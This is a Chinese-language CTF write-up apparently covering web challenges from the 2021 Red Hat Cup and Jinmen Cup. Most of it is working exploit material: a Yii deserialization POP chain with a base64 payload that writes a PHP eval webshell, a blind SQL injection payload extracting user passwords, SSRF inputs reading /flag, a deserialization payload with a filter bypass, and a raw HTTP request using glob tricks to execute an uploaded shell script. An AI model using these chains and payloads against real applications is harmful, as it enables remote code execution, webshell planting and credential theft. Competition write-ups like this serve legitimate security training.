2021_Red_Hat and WICCTF_WP

还在安徽,直接在酒店里看了看题。

红帽杯

find_it

robots.txt,swp 源码泄露

flag 在 phpinfo

framework

Yii 的反序列化链

POC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public $modelClass;

public function __construct(){
$this->checkAccess = 'assert';
$this->id = "file_put_contents('1.php', '<?php eval(\$_POST[Du1]);');";
}
}
}

namespace Faker{
use yii\rest\CreateAction;

class Generator{
protected $formatters;

public function __construct(){
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}

namespace yii\db{
use Faker\Generator;

class BatchQueryResult{
private $_dataReader;

public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yii\db\BatchQueryResult));
}

// TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mzp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjU1OiJmaWxlX3B1dF9jb250ZW50cygnMS5waHAnLCAnPD9waHAgZXZhbCgkX1BPU1RbRHUxXSk7Jyk7IjtzOjEwOiJtb2RlbENsYXNzIjtOO31pOjE7czozOiJydW4iO319fX0=

about 里传入,写个🐎,Apache_mod_cgi 绕 disable_func,readflag 读取 flag。

WebsiteManger

盲注得到管理员密码,payload:^((ascii(substr((select(group_concat(password))from(users)),{},1)))={})

SSRF 。

1
2
file:///flag
127.0.0.1

ezlight

占坑,垃圾某春秋十二点就急着关靶机,没来得及复现,先占个坑,Y1ng 师傅太QQQQQ了

https://www.gem-love.com/websecurity/2763.html#0x01_%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0

津门杯

power_cut

swp 源码泄露。

反序列化,直接利用 logger 的 readfile 读取 flag,flag 被过滤,可以用双写绕过。

poc

1
2
3
4
5
6
7
8
9
10
11
12
<?php
class logger{
public $logFile;
public $initMsg;
public $exitMsg;
}

class weblog {
public $weblogfile="/flag";
}

echo urlencode(serialize(new weblog()));

payload

O%3A6%3A%22weblog%22%3A1%3A%7Bs%3A10%3A%22weblogfile%22%3Bs%3A5%3A%22%2Fflflagag%22%3B%7D

hatephp

php5,p师傅文章里提到过这个方法,@ 被过滤,用 ? 即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /?code=?><?=`.%20/???/????????[?-[]`;?> HTTP/1.1
Host: 122.112.214.101:20004
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryrGKCBY7qhFd3TrwA
Content-Length: 170

------WebKitFormBoundaryrGKCBY7qhFd3TrwA
Content-Disposition: form-data; name="file"; filename="3.sh"

#!/bin/sh

cat /flag
------WebKitFormBoundaryrGKCBY7qhFd3TrwA--

ezsql

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
highlight_file(__FILE__);
session_start();
$url = $_GET['url'] ?? false;
if($url)
{
$a = preg_match("/file|dict/i", $url);
if ($a==1)
{
exit();
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}

?>

ssrf 打 admin.php:?url=http://121.36.147.29:20001/admin.php